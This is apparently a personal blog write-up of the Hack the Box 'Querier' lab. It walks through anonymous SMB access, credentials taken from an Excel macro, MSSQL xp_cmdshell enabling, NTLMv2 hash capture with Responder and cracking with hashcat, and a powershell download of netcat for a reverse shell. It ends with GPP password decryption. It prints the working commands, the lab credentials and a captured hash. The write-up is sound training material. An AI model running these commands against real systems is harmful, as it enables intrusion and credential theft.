top of page
  • BlueDolphin

Hack the Box Querier

Updated: Apr 20, 2022


This was an amazing machine that involved insecure file sharing services that provided credentials for an SQL server connection and basic shell. From here we pursued the classic xp_cmdshell. However permissions were denied on the xp_cmdshell and we had to utilize responder and dir/file tree to bypass the permissions by creating a rogue SMB server and forcing the mssql server authentication to our rogue server capturing the hash. From here we landed a reverse shell using command injection for an initial foothold and enumerating with winpeas and powerup. This flagged the gpo history where we found a group policy xml template with a password hash that we cracked for administrator.


Anonymous file login

File forensics

Excel macro extraction

SQL dir/file tree permission bypass

SQL xp_cmdshell

GPO history enumeration

Reverse shell

Tools used







Gpp Decrypt


Impacket-SMB Server

Python simple server



Hash identifier



We start off with a simple enumeration to get a quick snapshot of what we are working with. We initially see ports for a file share and SQL service. There is no web port so we can assume we must dive deep into SQL, file share or both.

Taking our enumeration a little further we scan the target machine using the nmap default scripts with -sC and the the nmap service enumeration scripts with -sV.

We gather the host and domain FQDN names and SQL version.

File share enumeration

Let's jump into file share enumeration using the smbclient unix script that can make a connection to smb file shares from a linux host.

smbclient -L 

We initially are presented with several hidden shares that are unlikely to reveal anything, or have the permissions we require. The final share however "Reports" is not a default share name and therefore does not have default and native permissions.

Connecting into the folder with the classic anonymous login and we see the 'Currency Volume Reports.xlsm' file.

We immediately attempt to download this file with the classic mget and get commands of which neither work. Upon further investigation we list all available commands and clearly see that mget is listed. Taking a closers look, the error message from mget stated it could not find the file 'Currency' which suggests it is not capturing the whole file name due to white spaces.

So we append single quotes around the file name without success. When appending double quotes however we achieve a file download.

File Forensics

Because the file Report.xlsm stuck out like a sore thumb I jumped into forensics right away to understand what it's purpose in the lab was. Running the file command shows us it is a Excel 2007 file. Although we could actually open this in excel I am instead going to check it for hidden files because my intuition is telling me to.

Running binwalk immediately revealed hidden content in the file.

Here we find the extracted file and we notice a macro titled 'vbaProject.bin' which we want to investigate right away.

Running cat on the file we see a large amount of content. Parsing through it all we find some valuable information within,

DB = volume

Uid = reporting

Pwd = PcwTWTHRwryjc$c6


SQL Connection

From here we are able to pivot into the impacket suite where we can utilize mssqlclient to make that initial connection with our newly found credentials.

python3 -windows-auth reporting:PcwTWTHRwryjc$c6@

This however kept erroring out, so I finally escapted the $ character and it worked.

python3 -windows-auth reporting:PcwTWTHRwryjc\$c6@


The xp_cmdshell literally spawns a command shell and accepts strings to execute as arguments. This is normally restricted or locked down on a system but is a common CTF target.

Here is a little guide below on the xp_cmdshell. Unfortunately it is not that easy as we can see that we do not have the needed permissions to pass commands to xp_cmdshell.

Researching this permissions error, leads me to the below resource which provides instructions on enabling the xp_cmdshell.


The steps are shown below;

EXEC sp_configure 'show advanced options',1;
EXEC sp_configure 'xp_cmdshell',1;

Man in the middle

Researching and diving into the forums it became clear that permisions are often deployed to protect these systems there are infact may ways to circumvent such initial and basic permissions. Trust wave released an amazing article on this below. I tried many of the techniques and the one which finally worked was MITM method leveraging responder to capture the hash from the SQL auth push to a spoofed SMB server, through the use of the SQL function dirtree.

Reference; cmd_shell bypass techniques

Reference: Actual use of the command

So I spun up a responder server

[SMB] NTLMv2-SSP Client :

[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc

[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:0e22bb333ed6c738:DE7F38F1DDF8DD5FBA04A659336A3822:010100000000000000EF18ABDBBFD7010EC138EF9A8EAE980000000002000800380037005A00540001001E00570049004E002D004F0059004F0055005600420053004E0035003400430004003400570049004E002D004F0059004F0055005600420053004E003500340043002E00380037005A0054002E004C004F00430041004C0003001400380037005A0054002E004C004F00430041004C0005001400380037005A0054002E004C004F00430041004C000700080000EF18ABDBBFD701060004000200000008003000300000000000000000000000003000005E57E89B872A66568CA654F48A9F822F9F6C264FA7A76FC823989A4D664D37FD0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0035003800000000000000000000000000

[*] Skipping previously captured hash for QUERIER\mssql-svc

Can't crack the hash

I was not able to crack the hash by copying and pasting it into a file. This is because the hash is actually several blocks in length so we have to use an out file natively prepared by responder found in ./usr/share/responder/logs/SMB-NTLMV2-SSP-

└─$ hashcat -m 5600 SMB-NTLMv2-SSP- ../../../../usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]


* Device #1: pthread-Intel(R) Core(TM) i7-10750H CPU @ 2.60GHz, 1423/1487 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0

Maximum password length supported by kernel: 256

Hashes: 3 digests; 2 unique digests, 2 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Rules: 1

Applicable optimizers applied:

* Zero-Byte

* Not-Iterated

ATTENTION! Pure (unoptimized) backend kernels selected.

Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.

If you want to switch to optimized backend kernels, append -O to your commandline.

See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.

Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache building ../../../../usr/share/wordlists/rockyou.txt: 33553434 bytDictionary cache built:

* Filename..: ../../../../usr/share/wordlists/rockyou.txt

* Passwords.: 14344392

* Bytes.....: 139921507

* Keyspace..: 14344385

* Runtime...: 0 secs



Session..........: hashcat

Status...........: Cracked

Hash.Name........: NetNTLMv2

Hash.Target......: SMB-NTLMv2-SSP-

Time.Started.....: Wed Oct 13 03:36:29 2021 (13 secs)

Time.Estimated...: Wed Oct 13 03:36:42 2021 (0 secs)

Guess.Base.......: File (../../../../usr/share/wordlists/rockyou.txt)

Guess.Queue......: 1/1 (100.00%)

Speed.#1.........: 1313.0 kH/s (1.39ms) @ Accel:1024 Loops:1 Thr:1 Vec:8

Recovered........: 2/2 (100.00%) Digests, 2/2 (100.00%) Salts

Progress.........: 17920000/28688770 (62.46%)

Rejected.........: 0/17920000 (0.00%)

Restore.Point....: 8957952/14344385 (62.45%)

Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1

Candidates.#1....: correita.54 -> cornbread3

Started: Wed Oct 13 03:36:06 2021

Stopped: Wed Oct 13 03:36:44 2021

Privileged SQL login

Using the username and password I attempted to login but this did not work. I receieved an error that the login was from an unstrusted Domain. I thought about this for a minute and clued it I would likely need to add the host, to our /etc/hosts file in order to be recognized and therefore trusted as a safe host mapping.



After adding querier.htb to our /etc/hosts file. I proceeded to connect to the host by using the forward lookup name @querier.htb.

From here I proceeded to test the xp_cmdshell command and was denied access. However I know that this user probably has higher permissions given it is the SQL service account. So going back and referencing the trustwave article I am able to enable cmdshell and execute commands.

EXEC sp_configure 'show advanced options',1;
EXEC sp_configure 'xp_cmdshell',1;

Reverse shell

File transfer of netcat with powershell wget

xp_cmdshell powershell wget

From here I proceeded to execute nc64.exe and pass arguments for a reverseshell.

xp_cmdshell nc64.exe -e cmd 6363

This however was not working so I decided to download the file to a defined location and calling from that defined location.

xp_cmdshell powershell wget -o C:\Users\mssql-svc\Downloads\nc64.exe

xp_cmdshell C:\Users\mssql-svc\Downloads\nc64.exe -e cmd 6363


From here I uploaded winpeas.exe as usual, however it did not work so I back tracked to the .bat version. First I file transferred with

xp_cmdshell powershell wget -o C:\Users\mssql-svc\Downloads\winPEAS.bat

I was able to run the script with


But wait! Juicy potatoe does not work on server 2019 and newer, and we are running server 2019.

Upon seeing the password, I immediately elevate my shell to powershell by simply typing powershell. From here I retrieved the file and proceeded to pass the hash found within the .xml.

C:\Users\All Users\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml    

C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml                                        

C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups> type Groups.xml                               
type Groups.xml     
<?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">                                                                                                          
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1">                                                                                                                                                                                              
<Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups>                                                                                                                           
PS C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups>       


Researching Group Policy Passwords lead me to a broader understanding and a decryption tool.

MyUnclesAreMarioAndLuigi !! 1!

1,348 views0 comments

Recent Posts

See All


bottom of page